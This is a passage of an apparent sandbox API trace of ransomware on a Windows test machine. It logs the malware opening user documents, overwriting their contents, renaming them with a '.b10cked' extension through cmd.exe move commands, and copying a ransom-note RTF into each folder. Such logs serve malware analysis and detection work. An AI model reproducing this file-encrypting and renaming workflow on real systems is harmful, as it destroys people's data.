\"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\gaY66uwM4.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x998, dwThreadId=0xb18)) returned 1 [0233.656] CloseHandle (hObject=0x120) returned 1 [0233.657] CloseHandle (hObject=0x1b4) returned 1 [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0233.657] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 3 [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.657] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.657] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.657] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.657] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.657] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.657] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.657] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.657] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.657] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xaa0, dwThreadId=0x740)) returned 1 [0233.951] CloseHandle (hObject=0x120) returned 1 [0233.951] CloseHandle (hObject=0x1b4) returned 1 [0233.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\bl0cked-readme.rtf")) returned 0x20 [0233.951] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.951] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.951] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.952] ReleaseMutex (hMutex=0xf8) returned 1 [0233.952] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Mmwj0D0mDfuQB5wXA.odp" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\mmwj0d0mdfuqb5wxa.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29074138478) returned 1 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.952] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x133b8 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.953] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12ed0 [0233.953] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x133b8 [0233.954] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x133b8 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.955] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x99db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x99db, lpOverlapped=0x0) returned 1 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.955] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x99db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x99db, lpOverlapped=0x0) returned 1 [0233.955] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-39387, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x99dd [0233.955] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x99db, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x99db, lpOverlapped=0x0) returned 1 [0233.956] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-39387, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x99dd [0233.956] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x99db, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x99db, lpOverlapped=0x0) returned 1 [0233.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mmwj0D0mDfuQB5wXA.odp", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0233.960] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mmwj0D0mDfuQB5wXA.odp", cchWideChar=21, lpMultiByteStr=0x1328834, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mmwj0D0mDfuQB5wXA.odp", lpUsedDefaultChar=0x0) returned 21 [0233.960] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x133b8 [0233.960] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.960] CloseHandle (hObject=0x1b4) returned 1 [0233.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\Mmwj0D0mDfuQB5wXA.odp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP") returned 0x2f [0233.961] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.962] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc88, dwThreadId=0xc90)) returned 1 [0233.967] CloseHandle (hObject=0x120) returned 1 [0233.967] CloseHandle (hObject=0x1b4) returned 1 [0233.968] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.968] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.968] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 2 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.968] ReleaseMutex (hMutex=0xf8) returned 1 [0233.968] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\UFl3tyKJKu.ppt" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\ufl3tykjku.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29075745547) returned 1 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.968] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3e02 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.969] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, 